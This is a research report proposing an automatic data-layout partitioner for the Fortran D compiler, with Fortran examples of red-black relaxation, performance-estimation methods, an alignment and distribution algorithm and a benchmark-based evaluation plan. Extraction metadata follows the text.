program depends on the coarse-grain parallelism defined by the physical parallel machine. Fortran D is a version of Fortran that provides data decomposition specifications for these two levels of parallelism using \texttt{DECOMPOSITION}, \texttt{ALIGN}, and \texttt{DISTRIBUTE} statements. A decomposition is an abstract problem or index domain; it does not require any storage. Each element of a decomposition represents a unit of computation. The \texttt{DECOMPOSITION} statement declares the name, dimensionality, and size of a decomposition for later use. The \texttt{ALIGN} statement is used to map arrays onto decompositions. Arrays mapped to the same decomposition are automatically aligned with each other. Alignment can take place either within or across dimensions. The alignment of arrays to decompositions is specified by placeholders in the subscript expressions of both the array and decomposition. In the example below, \begin{verbatim} REAL X(N,N) DECOMPOSITION A(N,N) ALIGN X(I,J) with A(J-2,I+3) \end{verbatim} \(A\) is declared to be a two dimensional decomposition of size \(N \times N\). Array \(X\) is then aligned with respect to \(A\) with the dimensions permuted and offsets within each dimension. After arrays have been aligned with a decomposition, the \texttt{DISTRIBUTE} statement maps the decomposition to the finite resources of the physical machine. Distributions are specified by assigning an independent \textit{attribute} to each dimension of a decomposition. Predefined attributes are \texttt{BLOCK}, \texttt{CYCLIC}, and \texttt{BLOCK_CYCLIC}. The symbol ‘\text{"::\}’ marks dimensions that are not distributed. Choosing the distribution for a decomposition maps all arrays aligned with the decomposition to the machine. In the following example, \begin{verbatim} DECOMPOSITION A(N,N) DISTRIBUTE A(:, BLOCK) DISTRIBUTE A(CYCLIC,:) \end{verbatim} distributing decomposition \( A \) by \((::, \text{BLOCK})\) results in a column partition of arrays aligned with \( A \). Distributing \( A \) by \((\text{CYCLIC}, :)\) partitions the rows of \( A \) in a round-robin fashion among processors. These sample data alignment and distributions are shown in Figure 2. We should note that our goal in designing Fortran D is not to support the most general data decompositions possible. Instead, our intent is to provide decompositions that are both powerful enough to express data parallelism in scientific programs, and simple enough to permit the compiler to produce efficient programs. Fortran D is a language with semantics very similar to sequential Fortran. As a result, it should be quite usable by computational scientists. In addition, we believe that our two-phase strategy for specifying data decomposition is natural and conducive to writing modular and portable code. Fortran D bears similarities to both CM Fortran [TMC89] and KALI [KM91]. The complete language is described in detail elsewhere [FIK90]. 3 Why is Finding a Good Data Layout Hard? The choice of a good data decomposition scheme depends on many factors. All these factors make it extremely difficult for a human to predict the behavior of a given data decomposition scheme without having to compile and run the program on the specific target system. The effect of a given data decomposition scheme and program structure on the efficiency of the compiler-generated code running on a given target machine depends on: 1. *compiler characteristics* such as the communication analysis algorithm and optimizing transformations used, and the set of communication primitives and routines that can be generated. For instance, fast collective communication routines as the Crystal router package developed at Caltech [FF88], are crucial for determining the profitability of realignment and redistribution. In addition, if the compiler generates a node program, the characteristics of the target machine node compiler have to be considered. 2. *machine characteristics*, such as communication and computation costs, and machine topology. For example, the specification of a three dimensional grid partition might be efficient on a machine with a three dimensional topology assuming the predominance of nearest neighbor communication. On a machine with a one dimensional ring topology the same specification leads to less efficient communication because messages must be sent to distant nodes on the ring, creating the potential for collisions. 1 DOUBLE PRECISION v(N,N), a, b 2 DECOMPOSITION d(N,N) 3 ALIGN v(I,J) WITH d(I,J) 4 DISTRIBUT d(BLOCK,BLOCK) 5 DO k = 1, M 6 // Compute the red points 7 DO j = 1, N, 2 8 DO i = 1, N, 2 9 v(i,j) = a*(v(i,j-1) + v(i-1,j) + v(i,j+1) + v(i+1,j)) + b*v(i,j) 10 ENDDO 11 ENDDO 12 DO j = 2, N, 2 13 DO i = 2, N, 2 14 v(i,j) = a*(v(i,j-1) + v(i-1,j) + v(i,j+1) + v(i+1,j)) + b*v(i,j) 15 ENDDO 16 ENDDO 17 // Compute the black points 18 DO j = 1, N, 2 19 DO i = 2, N, 2 20 v(i,j) = a*(v(i,j-1) + v(i-1,j) + v(i,j+1) + v(i+1,j)) + b*v(i,j) 21 ENDDO 22 ENDDO 23 DO j = 2, N, 2 24 DO i = 1, N, 2 25 v(i,j) = a*(v(i,j-1) + v(i-1,j) + v(i,j+1) + v(i+1,j)) + b*v(i,j) 26 ENDDO 27 ENDDO 28 ENDDO Figure 3: Fortran D code with BLOCK distribution, DOUBLE PRECISION 3. problem characteristics, such as actual problem size and number of processors to be used. The ratio between local computation and necessary communication can determine the efficiency of a data decomposition scheme. For some programs, problem characteristics are not needed to generate good data decomposition schemes. For such programs recompilation for different problem sizes and number of processors used can be avoided. In the reminder of this section, we will examine the relationship between the listed factors using the characteristics of the Fortran D compiler [HKT92b, HKT91, HHK91l]. Figure 3 shows a Fortran D code for pointwise red-black relaxation using a block-partitioning scheme for the N x N, double precision array v. Substituting line 4 by DISTRIBUT d(:,BLOCK) specifies a column partitioning scheme for array v. To execute a program on a distributed memory machine the program’s data and code have to be mapped into the local memories of the machine’s processors. The Fortran D compiler generates a node program according to the single program, multiple data (SPMD) programming model [Kar87], exploiting the data parallelism inherent in the program, as opposed to its functional parallelism. Each processor executes only those program statement instances that define a value of a data item that has been mapped onto that processor by the decomposition, alignment and distribution specifications. Data items that are mapped onto a processor are said to be *owned* by that processor. Execution of such a statement may require non-local data, i.e., data that is owned by another processor. Such non-local data items must be obtained by communication. For the given example we assume that the Fortran D compiler performs the following communication optimizations. *Message vectorization* uses the results of data dependence analysis [AK87, KKP⁺81] to combine element messages into vectors. The level of the deepest loop-carried true dependence or loop enclosing a loop-independent true dependence determines the outermost loop where element messages resulting from the same array reference may be legally combined [BFKK90, Ger90]. *Message coalescing* ensures that each data value is sent to a processor only once. A detailed description of different communication optimizations can be found in [HKT92a]. This paper also discusses an alternative approach to generating messages for the red-black example, called *vector message pipelining*. Using message vectorization, the Fortran D compiler generates communication statements before the first loop nest at line 7 and after the second loop nest between line 17 and line 19. Our hypothetical, simplified version of the Fortran D compiler inserts code to communicate all boundary points although only black or red points need to be communicated before the first and third loop, respectively. Figure 4 illustrates the resulting compute-communicate sequence for the block-partitioning and column-partitioning schemes. We assume in our example that the compiler generates an EXPRESS¹ node programs [EXP89] where communication is performed by calls to vector-send and vector-receive communication routines **KXVWR1** and **KXVREA**, respectively. Execution of **KXVWR1** is non-blocking in the sense that the sending processor does not wait until the message is received. Execution of **KXVREA** is blocking, i.e. the processor has to wait until it receives the message. Alternatively, the compiler could have chosen to insert calls to the communication routines **KXVCHA** that implement communication using --- ¹EXPRESS a copyright of ParaSoft Corporation. a handshaking protocol. Figure 5 and Figure 6 show the actual execution times of one iteration of the outermost timestep loop (line 5 in Figure 4) for increasing sizes of array \( \mathbf{v} \) using column-partitioning and block-partitioning schemes. Figure 5 shows the execution times on the Ncube-1 for 16 and 64 processors, where \( \mathbf{v} \) is a single precision floating point array. Figure 6 contains the results on 16 processors on the iPSC/860 for a single precision and double precision array \( \mathbf{v} \). The figures show that the tradeoffs between a column-partitioning and block-partitioning schemes for a compiler-generated node program. The tradeoffs depend on the actual problem size, i.e. the element size and overall size of the array \( \mathbf{v} \), the specific target machine, and the actual number of processors used on the target machine. What we need is a programming environment that helps the user to understand the effect of a given data decomposition and program structure on the efficiency of the compiler-generated code at the Fortran D language level. The Fortran D programming system, shown in Figure 1, provides such an environment. The main components of the environment are a static performance estimator and an automatic data partitioner. In this paper we will mainly discuss the automatic data partitioner. 4 Automatic Data Decomposition The key ideas and assumptions behind automatic data decomposition are 1. reasonably simple static models can be used to estimate the performance of a compiler-generated node program with explicit communication, and 2. the behavior of the Fortran D compiler on a specified program segment, such as a loop or the entire program, can be anticipated efficiently, i.e. without actually compiling the whole program, and 3. if we restrict ourselves to fairly simple decomposition schemes, then for a program segment there are only a small number of such decompositions suitable for each array and hence these decompositions can be exhaustively examined by an automatic system, and 4. the automatic data decomposition for the entire program can be done by successively decomposing the data for smaller program segments, and realignment/redistribution when necessary between the segments. We believe that these assumptions are true for loosely synchronous problems written in a data parallel programming style. In the following we will discuss some of the issues involved in the above key ideas and assumptions. 4.1 Static Performance Estimation It is clearly impractical to use dynamic performance information to choose between data decompositions in our programming environment. Instead, a static performance estimator is needed that can accurately predict the performance of a Fortran D program on the target machine. The performance estimator is not based on a general theoretical model of distributed-memory computers. Instead, it employs the notion of a training set of kernel routines that measures the cost of various computation and communication patterns on the target machine. The results of executing the training set on a parallel machine are summarized and used to train the performance estimator for that machine. By utilizing training sets, the performance estimator achieves both Figure 5: Measured times on Ncube-1: FLOAT operations on 16 and 64 processors Figure 6: Measured times on iPSC/860: DOUBLE PRECISION and FLOAT operations on 16 processors accuracy and portability across different machine architectures. The resulting information may also be used by the Fortran D compiler to guide communication optimizations. The static performance estimator is divided into two parts, a machine module and a compiler module. The compiler module predicts the performance at the Fortran D language level while the machine module estimates the performance at a level where the decomposition scheme is already 'hardcoded' into the program, i.e. at the node program level containing explicit communications. 4.1.1 Machine Module The machine module predicts the performance of a node programs with explicit communications. It uses a machine-level training set written in message-passing Fortran. The training set contains individual computation and communication patterns that are timed on the target machine for different numbers of processors and data sizes. To estimate the performance of a node program, the machine module can simply look up results for each computation and communication pattern encountered. Note that even though it is desirable, to assist automatic data decomposition the static performance estimator does not need to predict the absolute performance of a given data decomposition. Instead, the it only needs to accurately predict the performance relative to other data decompositions. In many cases the accurate prediction of the crossover point at which one data decomposition scheme is preferable over another will be sufficient. A prototype of the machine module has been implemented for a common class of loosely synchronous scientific problems [FJL+88]. It predicts the performance of a node program using EXPRESS communication routines for different numbers of processors and data sizes [EXP89]. The prototype performance estimator has proved quite precise, especially in predicting the relative performances of different data decompositions [BFKK91]. Figure 7 and Figure 8 show the estimated execution times for our red-black example using the training set approach. The crossover points and execution times induced by the different decomposition schemes are predicted with high accuracy. 4.1.2 Compiler Module The compiler module forms the second part of the static performance estimator. It assists the user in selecting data decompositions by statically predicting the performance of a program for a set of data decompositions. The compiler module employs a compiler-level training set written in Fortran D that consists of program kernels such as stencil computations and matrix multiplication. The training set is converted into message-passing Fortran using the Fortran D compiler and executed on the target machine for different data decompositions, numbers of processors, and array sizes. Estimating the performance of a Fortran D program then requires matching computations in the program with kernels from the training set. The compiler-level training set also provides a natural way to respond to changes in the Fortran D compiler as well as the machine. We simply recompile the training set with the new compiler and execute the resulting programs to reinitialize the compiler module for the performance estimator. Since it is not possible to incorporate all possible computation patterns in the compiler-level training set, the performance estimator will encounter code fragments that cannot be matched with existing kernels. To estimate the performance of these codes, the compiler module must rely on the machine-level training set. We plan to incorporate elements of the Fortran D compiler in the performance estimator so that it can mimic the compilation process. The compiler module can Figure 7: Estimated times on Ncube-1: FLOAT operations on 16 and 64 processors Figure 8: Estimated times on iPSC/860: DOUBLE PRECISION and FLOAT operations on 16 processors thus convert any unrecognized Fortran D program fragment into an equivalent node program, and invoke the machine module to estimate its performance. 4.2 Data Alignment and Data Distribution The analysis performed by the automatic data partitioner divides the program into separate computation phases. A phase consists of a group of statements that are mutually involved in a computation and therefore should be mapped onto the same Fortran D decomposition using ALIGN statements. In the absence of procedure calls we define a phase as follows: A phase is a loop nest such that for each induction variable that occurs in a subscript position of an array reference in the loop body the phase contains the surrounding loop that defines the induction variable. A phase is minimal in the sense that it does not include surrounding loops that do not define induction variables occurring in subscript positions. The maximal size and number of dimensions of arrays referenced in the phase defines the dimensionality and size of its associated Fortran D decomposition. For example, the red-black program in Figure 4 has four phases enclosed in the outer k-loop. Each phase has an associated Fortran D decomposition of dimensionality and size equal to the array v. 4.2.1 Intra-phase Alignment and Distribution The intra-phase decomposition problem consists of determining a set of good data decompositions and their performance for each individual phase. The data partitioner first tries to match the phase or parts of the phase with computation patterns in the compiler training set. If a match is found, it returns the set of decompositions with the best measured performance as recorded in the compiler training set. If no match is found, the data partitioner must perform alignment and distribution analysis on the phase. The resulting solution may be less accurate since the effects of the Fortran D compiler and target machine can only be estimated. Alignment analysis is used to prune the search space of possible arrays alignments by selecting only those alignments that minimize data movement. Alignment analysis is largely machine-independent; it is performed by analyzing the array access patterns of computations in the phase. We intend to build on the inter-dimensional and intra-dimensional alignment techniques of Li and Chen [LC90a] and Knobe et al [KLS90]. The alignment problems can be formulated as an optimization problem on an undirected, weighted graph. Some instances of the problem of alignment have been shown to be NP-complete [LC90a]. One major challenge in our proposed work will be to define the appropriate weights of the graph and to come up with a heuristic that solves the alignment problem in a way that is suitable for loosely synchronous problems. Alignment analysis is compiler dependent. A compiler may recognize arrays that are used only as temporaries and therefore are allocated locally in each processor without inducing any communication. These local or private arrays are not considered during the alignment analysis. Distribution analysis follows alignment analysis. It applies heuristics to prune unprofitable choices in the search space of possible distributions. Distribution analysis is compiler, machine, and problem dependent. For instance, the compiler may not be able to generate efficient wavefront computations [Lam74] for a subset of distributions. Transformations like loop interchange and strip-mining can substantially improve the degree of parallelism induced by the wavefront [HKT91]. Distributions that sequentialize the computation are eliminated. Another consideration in our pruning heuristic are the sizes of the dimensions of the decomposition. If the size of a dimension is smaller than a machine dependent threshold, the dimension will always be localized. This eliminates all distributions that map small dimensions to distinct processors. We will also restrict the possible block sizes in \texttt{BLOCK CYCLIC} distributions to a reasonable subset of values. After the automatic data partitioner has determined a set of reasonable data decomposition schemes, the static performance estimator is invoked to predict the performance of each reasonable scheme. ### 4.2.2 Inter-phase Alignment and Distribution After computing data decomposition schemes for each phase, the automatic data partitioner must solve the \textit{inter-phase} decomposition problem of merging individual data decompositions. It considers realigning and redistribution of arrays between computational phases to reduce communication costs or to improve the available parallelism. The merging problem can be formulated as a single-source shortest paths problem over the \textit{phase control flow graph}. The phase control flow graph is similar to the control flow graph [ASU86] where all nodes associated with a phase are substituted by nodes representing the set of reasonable data decomposition schemes for the phase. The static performance estimator is used to predict the costs for these reasonable decomposition schemes. The availability of fast collective communication routines will be crucial for the profitability of realignment and redistribution. The merging problem for a linear phase control flow graph can be solved as a single-source shortest paths problem in a directed acyclic graph [CLR90]. For example, Figure 9 shows a three phase problem with four reasonable decompositions for each phase. Each decomposition scheme is represented by a node. The node is labeled with the predicted cost of the decomposition scheme for the phase. Edges between phases are labeled with the realignment and redistribution costs for the source and sink decomposition schemes. For each of the four decompositions of the first phase we will solve the single-source shortest paths problem. In general, let $k$ denote the maximal number of decomposition schemes for each phase and $p$ the number of phases. The resulting time complexity is $O(p \times k^3)$. The merging of phases in a strongly connected component of the phase control flow graph should be done before merging any of its phases with a phase outside of the strongly connected component. This suggests a hierarchical algorithm for merging phases based on, for example, Tarjan intervals [Tar74]. Assuming that the innermost loop bodies can be represented by a linear phase control flow subgraph, the merging problem is solved by adding a shadow copy of the first phase after the last phase in the linear subgraph keeping the subgraph acyclic. After solving the single-source shortest paths problem, the subgraph is collapsed into a single interval summary phase representing the different costs resulting from entering the interval with a decomposition scheme and exiting it with a possibly different scheme. An example interval summary phase is shown in Figure 10. In the resulting phase control flow graph we again identify the innermost loops and repeat the process of collapsing and summarizing until the phase control flow graph consists of a single node. In fully automatic mode, the data partitioner selects the decomposition scheme that has the minimal cost for the shortest path from a decomposition in the first phase to a decomposition in the last phase of the selected program segment. Following the selected shortest path, ALIGN, and DISTRIBUTED statements are inserted if the decompositions at the source of an edge is different from the decompositions at the sink. DECOMPOSITION specifications are declared at the beginning of the subroutine containing the selected program segment. 4.2.3 The Algorithm Figure 11 gives the basic algorithm for automatic data decomposition for a program segment without procedure calls. The algorithm does not handle control flow other than loops and does not consider data replication. 4.2.4 Automatic Decomposition in the Presence of Procedure Calls One of the major challenges of the proposed research on automatic data decomposition is to devise techniques that can deal with procedure calls. Interprocedural analysis is used to allow the merging of computation phases across procedure boundaries. Interprocedural phase merging is compiler dependent. In particular, the automatic data partitioner has to know whether and when the compiler performs interprocedural optimizations such as procedure cloning [CHK92, HHKT91] or procedure inlining [Hal91]. In the following we will assume that the compiler performs procedure cloning for every distinct pattern of entry and exit **Algorithm DECOMP** *Input*: program segment without procedure calls; problem sizes and number of processors to be used. *Output*: data decomposition schemes for data objects referenced in the input program segment with diagnostic information. determine program phases of input program segment; build phase control flow graph; for each phase do perform alignment analysis; perform distribution analysis; generate diagnostic information, if available; endfor while phase control flow graph contains a loop do identify innermost loop (e.g., using Tarjan intervals); solve single-source shortest paths problem for this loop; identify realignment and redistribution points; generate diagnostic information, if available; substitute loop by its interval summary phase in the phase control flow graph; endwhile use the computed shortest path to generate **DECOMPOSITION, ALIGN,** and **DISTRIBUTE** statements, if in fully automatic mode; *Figure 11: Basic Algorithm for Automatic Data Alignment and Distribution* decomposition schemes. We will only consider programs with acyclic call graphs. The call graph is first traversed in topological order to propagate loop information into called procedures. This information is needed to identify single computation phases. Subsequently, the call graph is traversed in reverse topological order. For each procedure \( P \) the single-source shortest paths problem is solved on its phase control flow graph using the hierarchical approach of algorithm DECOMP in Figure 11. Each call site of \( P \) in procedure \( Q \) is represented by a copy of the interval summary phase of \( P \) in the phase control flow graph of \( Q \). The information about the computed data decomposition schemes with their realignment and redistribution points are passed to the Fortran D compiler. The automatic data partitioner cannot insert the Fortran D data layout statements directly into the program since it does not actually perform the cloning of procedures. If the compiler does not perform cloning a procedure can have only a single entry and exit decomposition scheme. The automatic data partitioner will use a heuristic to select the decomposition scheme. The heuristic takes the static execution count of call sites and the penalties due to mismatched decomposition schemes into account. Using the outlined strategy the automatic system generates the same decomposition, alignment, and distribution for the programs of Figure 3 and Figure 12. 5 Success/Failure Criterion The feasibility of the proposed automatic techniques depends on the ‘quality’ of the generated decomposition schemes compared to schemes that are considered optimal. We want to define our quality measure prior to an investigation into automatic techniques. This will guarantee an unbiased discussion of results gained by an empirical study. We will use a benchmark suite being developed by Geoffrey Fox at Syracuse that consists of a collection of Fortran programs. Each program in the suite will have five versions: - (v1) the original Fortran 77 program, - (v2) the best hand-coded message-passing version of the Fortran program, - (v3) a “nearby” Fortran 77 program, - (v4) a Fortran D version of the nearby program, and - (v5) a Fortran 90 version of the program. The “nearby” version of the program will utilize the same basic algorithm as the message-passing program, except that all explicit message-passing and blocking of loops in the program are removed. The Fortran D version of the program consists of the nearby version plus appropriate data decomposition specifications. To validate the automatic data partitioner, we will use it to generate a Fortran D program from the nearby Fortran program (v3). The result will be compiled by the Fortran D compiler and its running time compared with that of the compiled version of the hand-generated Fortran D program (v4). Our goal is that for 80% of the benchmark programs the nearby version with automatically generated data layout will run at most 20% slower than the hand-generated Fortran D program. We expect that such a performance degradation due to automatic data decomposition is still acceptable to the user. We believe that in many cases it is easy for the user to specify the problem mapping, i.e. the data alignment onto a decomposition, since the problem mapping is determined by the structure DOUBLE PRECISION v(N,N), a, b DECOMPOSITION d(N,N) ALIGN v(I,J) WITH d(I,J) DISTRIBUTE d(BLOCK,BLOCK) DO k = 1, M // Compute the red points CALL redpoints (v,a,b,N) // Compute the black points CALL blackpoints (v,a,b,N) ENDDO SUBROUTINE redpoints (v,a,b,n) INTEGER n DOUBLE PRECISION v(n,n), a, b DO j = 1, N, 2 DO i = 1, N, 2 v(i,j) = a*(v(i,j-1) + v(i-1,j) + v(i,j+1) + v(i+1,j)) + b* v(i,j) ENDDO ENDDO DO j = 2, N, 2 DO i = 2, N, 2 v(i,j) = a*(v(i,j-1) + v(i-1,j) + v(i,j+1) + v(i+1,j)) + b* v(i,j) ENDDO ENDDO END SUBROUTINE blackpoints (v,a,b,n) INTEGER n DOUBLE PRECISION v(n,n), a, b DO j = 1, N, 2 DO i = 2, N, 2 v(i,j) = a*(v(i,j-1) + v(i-1,j) + v(i,j+1) + v(i+1,j)) + b* v(i,j) ENDDO ENDDO DO j = 2, N, 2 DO i = 1, N, 2 v(i,j) = a*(v(i,j-1) + v(i-1,j) + v(i,j+1) + v(i+1,j)) + b* v(i,j) ENDDO ENDDO END Figure 12: Example loop nest with procedure calls. of the underlying algorithm. However, the user will have difficulties to predict the combined effects of the compiler, problem, and machine characteristics on the performance of a specified data decomposition scheme. Therefore we expect the Fortran D program generated by the automatic data partitioner to do better than the hand-coded Fortran D version for some programs of the benchmark suite. Initially, the automatic techniques will be validated by applying them to whole programs in the benchmark suite. If automatic techniques will fail for whole programs, we want to understand why this is the case and how user interaction can overcome their deficiencies. 6 Related Work and Research Goals Our proposed techniques for automatic data decomposition are based on previous work done by 1. Knobe, Lukas at Compass, Steele at Thinking Machines Corporation, and Natarajan at Motorola [KLS90, KN90], 2. Li, Chen, and Choo for the Crystal project at Yale University [CCL89, LC90a, LC91b, LC91a, LC90b], and 3. Balasundaram, Fox, Kennedy, and Kremer at Caltech and Rice University in the context of the Fortran D distributed memory compiler and environment project [FHK+90, HKT92b, HKT91, HHKT91, BFKK90, BFKK91, HKK+91]. Knobe, Lukas, Natarajan and Steele deal with the problem of automatic data layout for SIMD architectures such as the Connection machine. They discuss an algorithm that uses heuristics to solve conflicting requirements between minimizing communication and maximizing parallelism. They also observed the problem of data replication of arrays that are used solely as temporaries. Li, Chen, and Choo discuss automatic data decomposition in the context of a functional language. They introduce the notion of index domains for phases of the computation. After alignment, i.e. mapping data objects or functions into the common index domain of the phase, the functional program is transformed into an imperative, intermediate form. Data partitioning is defined on the data objects of the intermediate program and is specified by the user at execution time of the program. Li, Chen, and Choo also briefly discuss ideas for automatic data partitioning. Given a data partitioning strategy, a performance model is used to determine optimal communication, selecting efficient collective communication routines whenever possible. In contrast to the Crystal project, the input to our system is an imperative language, namely Fortran. Since Crystal starts out with a functional program many functional characteristics are still present in the imperative, intermediate code. Balasundaram, Fox, Kennedy, and Kremer proposed an interactive performance estimation tool that helps the user to understand the effects of a user specified decomposition with respect to communication time and overall execution time [BFKK90] without actually compiling and executing the program. The described techniques are based on the knowledge about the compiler, the actual problem size, and the number of processors to be used. In [BFKK91], techniques are discussed that allow static performance estimation with high accuracy for a large class of loosely synchronous problems. Some approaches to automatic data decomposition concentrate on single loop nests. The iteration space is first partitioned into sets of iterations that can be executed independently. The data mapping is determined by the iterations that are assigned to the different processors [RS89, Ram90, D’H89, KKB91]. Other techniques for single loop nests are based on recognizing specific computation patterns in the loop, called \textit{stencils} [SS90, HA90, IFKF90, GAY91]. This more abstract representation is used to find a good data mapping. Our approach to automatic data alignment and distribution is closely related to the work done by Gupta and Banerjee at the University of Illinois at Urbana-Champaign [GB90, GB91, GB92], Wholey at Carnegie Mellon University [Who91], and Chapman, Herbeck, and Zima at the University of Vienna [CHZ91]. The described techniques for automatic data decomposition work on whole programs taking machine characteristics and problem characteristics into account. The automatic data partitioner is an integral part of the compiler. The major contributions of our research are 1. the development of new techniques for automatic data alignment and distribution. These techniques consider realignment, redistribution, and data replication to minimize communication or enhance the available parallelism in the program. The techniques have to consider procedure calls and control flow. 2. the design of a portable automatic data decomposition tool that achieves compiler and machine independence by using compiler and machine level training sets. 3. the validation of the new techniques using a suite of benchmark programs. 4. the answer to the question whether there is a data parallel programming style that allows the automatic data decomposition of regular loosely synchronous programs across a variety of distributed memory machines. The proposed automatic techniques will be implemented as part of the ParaScope parallel programming environment adapted to distributed memory multiprocessors [BKK+89, KMT91, BFKK90, HKK+91]. A prototype of the machine module of the static performance estimator is already available [BFKK91]. 7 Acknowledgement We wish to thank Seema Hiranandani and Chau-Wen Tseng for many discussions and helpful comments on the content of this paper. Many thanks also to Joe Warren for his comments and ideas, and to the ParaScope research group for providing the underlying software infrastructure for the Fortran D programming system. References St. Charles, IL, August 1989.
{"Source-Url": "http://softlib.rice.edu/pub/CRPC-TRs/reports/CRPC-TR91205-S.pdf", "len_cl100k_base": 8792, "olmocr-version": "0.1.50", "pdf-total-pages": 26, "total-fallback-pages": 0, "total-input-tokens": 150573, "total-output-tokens": 13400, "length": "2e13", "weborganizer": {"__label__adult": 0.0003533363342285156, "__label__art_design": 0.00039076805114746094, "__label__crime_law": 0.0003273487091064453, "__label__education_jobs": 0.001308441162109375, "__label__entertainment": 0.0001112222671508789, "__label__fashion_beauty": 0.0002015829086303711, "__label__finance_business": 0.0003292560577392578, "__label__food_dining": 0.0003840923309326172, "__label__games": 0.0007596015930175781, "__label__hardware": 0.0019121170043945312, "__label__health": 0.0006747245788574219, "__label__history": 0.0004456043243408203, "__label__home_hobbies": 0.0001575946807861328, "__label__industrial": 0.0007567405700683594, "__label__literature": 0.0003199577331542969, "__label__politics": 0.00032973289489746094, "__label__religion": 0.000659942626953125, "__label__science_tech": 0.1656494140625, "__label__social_life": 0.00011420249938964844, "__label__software": 0.01131439208984375, "__label__software_dev": 0.81201171875, "__label__sports_fitness": 0.0004024505615234375, "__label__transportation": 0.0008978843688964844, "__label__travel": 0.00027441978454589844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 54451, 0.04354]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 54451, 0.42491]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 54451, 0.8449]], "google_gemma-3-12b-it_contains_pii": [[0, 309, false], [309, 3053, null], [3053, 5642, null], [5642, 9252, null], [9252, 11812, null], [11812, 13852, null], [13852, 16265, null], [16265, 19552, null], [19552, 19630, null], [19630, 19723, null], [19723, 23410, null], [23410, 23489, null], [23489, 23583, null], [23583, 27441, null], [27441, 29678, null], [29678, 32118, null], [32118, 33147, null], [33147, 36517, null], [36517, 37515, null], [37515, 40574, null], [40574, 43180, null], [43180, 45555, null], [45555, 47954, null], [47954, 50598, null], [50598, 53106, null], [53106, 54451, null]], "google_gemma-3-12b-it_is_public_document": [[0, 309, true], [309, 3053, null], [3053, 5642, null], [5642, 9252, null], [9252, 11812, null], [11812, 13852, null], [13852, 16265, null], [16265, 19552, null], [19552, 19630, null], [19630, 19723, null], [19723, 23410, null], [23410, 23489, null], [23489, 23583, null], [23583, 27441, null], [27441, 29678, null], [29678, 32118, null], [32118, 33147, null], [33147, 36517, null], [36517, 37515, null], [37515, 40574, null], [40574, 43180, null], [43180, 45555, null], [45555, 47954, null], [47954, 50598, null], [50598, 53106, null], [53106, 54451, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 54451, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 54451, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 54451, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 54451, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 54451, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 54451, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 54451, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 54451, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 54451, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 54451, null]], "pdf_page_numbers": [[0, 309, 1], [309, 3053, 2], [3053, 5642, 3], [5642, 9252, 4], [9252, 11812, 5], [11812, 13852, 6], [13852, 16265, 7], [16265, 19552, 8], [19552, 19630, 9], [19630, 19723, 10], [19723, 23410, 11], [23410, 23489, 12], [23489, 23583, 13], [23583, 27441, 14], [27441, 29678, 15], [29678, 32118, 16], [32118, 33147, 17], [33147, 36517, 18], [36517, 37515, 19], [37515, 40574, 20], [40574, 43180, 21], [43180, 45555, 22], [45555, 47954, 23], [47954, 50598, 24], [50598, 53106, 25], [53106, 54451, 26]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 54451, 0.0]]}
olmocr_science_pdfs
2024-12-02
2024-12-02
2b0773b2b82b704681ca611a5f0d8d17270cabb4
[REMOVED]
{"Source-Url": "https://ntrs.nasa.gov/archive/nasa/casi.ntrs.nasa.gov/20050137710.pdf", "len_cl100k_base": 9604, "olmocr-version": "0.1.53", "pdf-total-pages": 16, "total-fallback-pages": 0, "total-input-tokens": 41701, "total-output-tokens": 10961, "length": "2e13", "weborganizer": {"__label__adult": 0.00033926963806152344, "__label__art_design": 0.0006122589111328125, "__label__crime_law": 0.0006384849548339844, "__label__education_jobs": 0.0036773681640625, "__label__entertainment": 0.0001418590545654297, "__label__fashion_beauty": 0.00022280216217041016, "__label__finance_business": 0.0006399154663085938, "__label__food_dining": 0.0005125999450683594, "__label__games": 0.0010442733764648438, "__label__hardware": 0.0011377334594726562, "__label__health": 0.0008020401000976562, "__label__history": 0.0004458427429199219, "__label__home_hobbies": 0.00020647048950195312, "__label__industrial": 0.000927448272705078, "__label__literature": 0.0008873939514160156, "__label__politics": 0.0004119873046875, "__label__religion": 0.0006022453308105469, "__label__science_tech": 0.388916015625, "__label__social_life": 0.00020647048950195312, "__label__software": 0.0238189697265625, "__label__software_dev": 0.572265625, "__label__sports_fitness": 0.00031447410583496094, "__label__transportation": 0.00078582763671875, "__label__travel": 0.00023949146270751953}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 42159, 0.01719]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 42159, 0.67068]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 42159, 0.89972]], "google_gemma-3-12b-it_contains_pii": [[0, 2283, false], [2283, 5553, null], [5553, 8891, null], [8891, 11617, null], [11617, 14991, null], [14991, 17683, null], [17683, 19812, null], [19812, 21661, null], [21661, 25096, null], [25096, 28318, null], [28318, 31365, null], [31365, 33385, null], [33385, 36718, null], [36718, 39050, null], [39050, 40064, null], [40064, 42159, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2283, true], [2283, 5553, null], [5553, 8891, null], [8891, 11617, null], [11617, 14991, null], [14991, 17683, null], [17683, 19812, null], [19812, 21661, null], [21661, 25096, null], [25096, 28318, null], [28318, 31365, null], [31365, 33385, null], [33385, 36718, null], [36718, 39050, null], [39050, 40064, null], [40064, 42159, null]], 